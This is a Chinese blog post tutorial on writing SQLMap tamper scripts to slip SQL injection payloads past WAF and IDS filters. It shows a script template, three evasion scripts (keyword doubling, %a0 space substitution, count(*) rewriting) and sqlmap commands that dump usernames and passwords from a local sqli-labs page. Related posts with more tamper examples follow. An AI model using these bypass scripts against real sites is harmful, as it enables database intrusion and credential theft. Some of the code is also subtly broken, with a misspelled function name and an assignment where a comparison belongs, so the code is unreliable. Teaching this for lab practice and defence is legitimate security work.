【Python脚本】SQLMap的Tamper脚本——绕过网站自身

已于 2023-10-18 21:57:56 修改
阅读量356 收藏 3
点赞数
文章标签: python 开发语言
于 2023-10-17 23:02:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55205599/article/details/133895159
版权

一、概念

1、SQLMap

实现SQL注入漏洞的检测与利用的自动化处理,其自带的Tamper脚本可以帮助绕过IDS/WAF的检测

2、Tamper脚本

绕过安全防护

3、IDS(入侵检测系统)

深入浅出讲解IDS(入侵检测系统)_ids是什么意思-CSDN博客

形象比喻:假如防火墙是一幢大楼的防盗门和安全锁,那么IDS(入侵检测系统)就是这幢大楼里的监视系统。一旦有小偷通过爬窗进入大楼,或者内部人员有越界行为,实时监视系统就会发现情况并发出警告

4、WAF(web应用防火墙)

WAF介绍-CSDN博客

是通过执行一系列针对HTTP,HTTPS的安全策略,来专门对web应用,提供保护的一款产品

二、SQL注入技术

1、基于布尔的盲注

能根据页面的返回内容判断真假

2、基于时间的盲注

不能根据页面的返回内容来判断信息,而是使用条件语句查看时间延迟语句是否执行(即页面的返回时间是否增加),以此来判断

3、基于报错的注入

根据页面返回的错误信息来判断,或者把注入语句的结果直接返回到页面中

4、堆查询注入

同时执行多条语句的执行时的注入

三、Tamper结构

难点是如何针对目标网站的防护找出对应的绕过方法

# 导入SQLMap中lib\core\enums中的PRIORITY优先级函数
from lib.core.enums import PRIORITY
# 定义脚本优先级
__priority__ = PRIORITY.LOW

# 对当前脚本的介绍,可以为空
def dependencies():
	pass

'''
对传进来的payload进行修改并返回
函数有两个参数。主要更改的是payload参数,kwargs参数用得不多。
在官方提供的Tamper脚本中只被使用了2次,两次都只是更改了http-header
'''

def tamoper(payload,**kwargs):
	# 增加相关的payload处理,再将payload返回
	# 必须返回最后的payload
	return payload

四、脚本编写

1、双写绕过脚本

double-and-or.py

# 双写绕过脚本
# 导入正则模块,用于字符的替换
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW

# 脚本描述函数
def dependencies():
	pass

def tamper(payload,**kwargs):
	# 将payload进行转存
	retVal = payload
	if payload:
		# 使用re.sub函数不区分大小写地替换and 和or
		# 将and和or替换为anandd和oorr
		retVal = re.sub(r"(?i)(or)",r"oorr",retVal)
		retVal = re.sub(r"(?i)(and)", r"anandd", retVal)
	#把最后修改好的payload返回
	return retVal

2、空格替换脚本

space2A0.py

# 空格替换脚本  ---以官方Tamper脚本的space2plus.py为模板进行更改
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW

# 脚本描述函数
def dependencies():
	pass

def tamper(payload,**kwargs):
	retVal = payload
	if payload:
		retVal = ""
		quote,doublequote,firstspace = False,False,False
		
		for i in xrange(len(payload)):
			if not firstspace:
				if payload[i].isspace():
					firstspace = True
					# 把原先的 + 改为%a0即可
					retVal += "%a0"
					continue
			elif payload[i] == '\'':
				quote = not quote
				
			elif payload[i] == '"':
				doublequote = not doublequote
			
			elif payload[i] = " " and not doublequote and not quote:
				# 把原先的 + 改为 %a0即可
				retVal += "%a0"
				continue
			retVal += payload[i]
	return retVal

3、count(*)替换为count(1)

count.py

import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW

def dependencies():
	pass

def tamper(payload,**kwargs):
	retVal = payload
	if payload:
		# 把count(*) 替换为count(1)
		retVal = re.sub(r"(?i)count\(\*\)",r"count(1)",payload)
	return retVal

五、脚本执行

1、找注入点

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3" --tamper "double-and-or.py,space2A0.py" -v 3

2、遍历数据库

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py"  -dbs

3、遍历security库里的数据表

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py"  -D “security” --tables

4、遍历security库中users表的字段

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py"  -D “security” -T “users” --columns

5、遍历数据

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py"  -D “security” -T “users” -C “username,password” --dump

此时,没有数据,说明遍历数据库数据的payload还是有问题

payload中的count(*) 出现了关键词*,说明是被过滤了

再写一个脚本把count(*)进行替换,通过count(常数)来代替count(*)

继续遍历数据:

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py,count.py"  -D “security” -T “users” -C “username,password” --dump

网络安全之路
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python的编码模块char_关于sqlmap当中tamper脚本编码绕过原理的一些总结(学习python没多久有些地方肯定理解有些小问题)...
weixin_35792236的博客
02-21 233
sqlmaptamper脚本分析编写置十对一些编码实现的脚本,很多sqlmap里面需要引用的无法实现,所以有一部分例如keywords就只写写了几个引用了一下,其实这里很多脚本运用是可以绕过安全狗的。本人也是刚开始学习python没多久,有一些错误的话请指正chardoubleencode.py:对给定的payload全部字符使用双重url编码:import stringimport syspa...
进阶的sqlmap用法(参数讲解)
0yst3r ‘s blog
09-21 1万+
进阶的sqlmap用法 参数讲解 1>探测等级: --level 5 --level 5 指的是需要执行的测试等级 一共有5个等级(1-5) 不加 level 时,默认是1 5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。 level=2 http cookie会测试 level=3 http...
【sql注入-WAF绕过】编写sqlmaptamper进行sql注入
06-29 6013
【特征】特殊符号+十六进制格式
sqlmap 使用tamper脚本绕过WAF
最新发布
xf3401837266的博客
05-22 616
sqlmap 使用tamper脚本绕过WAF
渗透测试-sqlmap绕过WAF脚本编写
lza20001103的博客
04-21 4405
渗透测试-sqlmap绕过WAF脚本编写
第19篇:WEB漏洞~SQL注入~SqlMap绕过WAF
廖一语山的博客
08-06 1758
Sqlmap
sqlmap 双写关键字绕过 tamper
shadowwolf’s blog
08-30 2495
双写绕过的存在一般都是在某一些简单的waf中,将关键字select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过 但是鉴于手注有些小麻烦,所以还是上sqlmap sqlmap中无双写注入的脚本,所以我编写了一个tamper,可以根据测出的被ban的关键词进行修改: #!/usr/bin/env python ''' sqlmap 双写绕过 by:shadowwolf ''' from lib.core.compat import xrange from lib.core.enums i
sqlmap绕过过滤的 tamper 脚本分类汇总
03-17
sqlmap绕过过滤的 tamper 脚本分类汇总 sqlmap
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
这个脚本合集给出了各种数据库对应的绕waf脚本名称,方便针对各种过滤手段选择对应的脚本 在许多情况下,防火墙只能防御已知的攻击模式和威胁。然而,SQL注入是一种动态的、高度灵活的攻击方式,防火墙很难对其进行...
3 、Sqlmap Tamper脚本分析(MSSQL)-01
09-15
Sqlmap Tamper脚本是一种特殊的脚本,用于绕过Web应用程序的防火墙和入侵检测系统,以便进行SQL injection攻击。Tamper脚本可以对payload进行修改,使其能够绕过安全防护机制。下面将对Sqlmap Tamper脚本进行分析,...
sqlmap绕过过滤的 tamper 脚本分类汇总(1).xlsx
12-10
sqlmap绕过过滤的 tamper 脚本分类汇总(1).xlsx
WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF
ran的博客
01-25 2641
此时可以在SQLMAP的命令里加入“--random-agent”参数,此参数的作用是使User-Agent后面的值按照其字典随机出现。因此就需要我们自己来写脚本,在自己写脚本的过程中可以参考“tamper”下的脚本,可以对里面的脚本进行修改。在漏洞防护规则里可以看到包含一种名为“工具拦截”的检测类型,当其发现是使用sqlmap工具时,就会进行拦截。但是这些默认的脚本必然是不能绕过我们现在常见的一些WAF的(可以绕过一些比赛的拦截规则,如CTF比赛等)。可以看到此时网站可以正常访问,可以进行正常注入。
二、sql绕过过滤
黑日里不灭的light
11-27 979
解释:sql绕过过滤,通俗来说就是你注入的sql语句里面有一些关键词被WAF过滤掉了,你需要想一些办法进行绕过。解释:有一种内联注释注入(其只存在于mysql),其相比上面的注入更常用,其是。解释:下面是三种注释方法,常用的是前两种,其中在浏览器中注释一般用。,如果匹配成功就进行将关键词删除,我们可以构造。解释:指某些函数被过滤之后用同义函数去替代。从而实现注入(这种情况适合条件很苛刻)也可能成功绕过WAF的过滤实现注入。适用情况:WAF会进行匹配关键词如。适用情况:当WAF将如。适用情况:对例子一般。
Python脚本SQLMapTamper脚本——绕过安全狗
weixin_55205599的博客
10-18 429
针对WAF编写Tamper脚本进行绕过安装网站安全狗,此时再次尝试SQL注入时,安全狗会拦截。
iwebsec靶场 SQL注入漏洞通关笔记9- 双写关键字绕过
mooyuan的博客
11-29 1316
打开靶场第09关,http://192.168.71.151/sqli/09.php?id=1如下所示​SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第9关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的第09关卡过滤了不区分大小写select关键字。
定制SQLmap和WAF绕过
weixin_58954236的博客
09-23 842
以sqli-lab第26关为例输入?id=1’ --+,报错字符型注入考虑闭合问题,输入?id=1’ and '1,但是回显中and和空格消失了,可知and和空格被过滤了因为and和or被过滤考虑使用双写绕过手段,空格使用其他字符进行代替例如%0a或%a0使用SQLmap扫描,结果无SQL注入漏洞可是明明手动测试存在SQL注入漏洞但是SQLmap竟然没有扫描出来,是因为SQLmap在进行注入的时候没有合适的绕过手法,被过滤掉了,那么就需要我们对SQLmap发送的payload进行编码。
sqlmaptamper脚本绕过】更新中。。。
DMXA的博客
10-18 190
level设置注入探测等级共有五个等级,默认为1级, 这个参数不仅影响使用哪些payload同时也会影响测试的注入点,GET和POST的数据都会测试,HTTP Cookie在level为2的时候就会测试,HTTP User-Agent/Referer头在level为3的时候就会测试。总之在你不确定哪个payload或者参数为注入点的时候,为了保证全面性,建议使用高的level值。-v ["x"]
使用sqlmap 绕过防火墙进行注入测试
热门推荐
煜铭2011
04-20 4万+
0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕...
写一个sqlmaptamper模块中的Python脚本
08-07
### 回答1: 我可以给你一种典型的Python脚本,它可以用于SQLMAPTamper模块:import randomdef tamper(payload, **kwargs): """ Replace random character with an upper case """ retVal = payload if payload: retVal = "" quote, double_quote, first = False, False, True for i in range(len(payload)): if payload[i] == '\'' and not double_quote: quote = not quote elif payload[i] == '"' and not quote: double_quote = not double_quote random_char = random.choice("abcdefghijklmnopqrstuvwxyz") if not quote and not double_quote: if first: random_char = random_char.upper() first = False retVal += random_char return retVal ### 回答2: SQLMap是一款常用的SQL注入工具,它包含了许多模块,其中tamper模块用于修改HTTP请求和响应以绕过WAF(Web应用程序防火墙)或其他过滤机制。 可以编写一个示例脚本来说明如何使用tamper模块中的Python脚本。以下是一个基本的示例: ```python #!/usr/bin/env python # -*- coding: utf-8 -*- import random # 定义一个名称为my_tamper的函数 def my_tamper(payload, **kwargs): # 随机生成一个1或0的数,用于决定是否执行tamper if random.randint(0, 1) == 1: return payload else: # 将所有的'和"替换为%00 return payload.replace("'", "%00").replace('"', "%00") # 在tamper模块中注册函数 def register(): return {'my_tamper': my_tamper} ``` 上述脚本定义了一个名为`my_tamper`的函数,它接受一个名为`payload`的参数和其他任意参数,返回修改后的payload。在这个示例中,`my_tamper`函数的逻辑是随机决定是否执行tamper,如果执行tamper,则将payload中的单引号和双引号替换为`%00`。 脚本的最后一行`register()`用于将`my_tamper`函数注册到tamper模块中。 要在SQLMap中使用这个脚本,将脚本保存并命名为`my_tamper.py`,然后使用以下命令执行: `python sqlmap.py -u <target-url> --tamper my_tamper` 其中`<target-url>`是目标网站的URL。执行命令后,SQLMap将加载自定义的tamper脚本并将其应用于注入过程中的payload。 以上是一个简单的示例,tamper模块的具体使用方式和功能请参考SQLMap的官方文档以及tamper模块中的其他脚本。 ### 回答3: 下面是一个简单的SQLMAPtamper模块中的Python脚本示例: ```python #!/usr/bin/env python # -*- coding: utf-8 -*- """ 这是一个SQLMAP tamper模块的示例。 该脚本用于在SQL注入漏洞测试期间修改从数据库获取的数据。 作者:聊聊AI小助手 """ import random import string # 定义tamper函数 def tamper(payload, **kwargs): # 生成一个随机字符串 random_string = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(5)]) # 将payload中的单引号替换为双引号 payload = payload.replace("'", '"') # 在payload中添加随机字符串 payload = payload.replace(" ", "/*{}*/".format(random_string)) return payload # 测试tamper函数 print(tamper("SELECT * FROM users WHERE id=1;")) ``` 上面的脚本是一个简单的tamper模块脚本示例,将payload中的单引号替换为双引号,并在payload中添加了一个随机字符串来绕过一些简单的过滤机制。 请注意,这只是一个示例,实际情况下,tamper模块的实现会更加复杂,并且会根据具体的注入漏洞和目标数据库进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值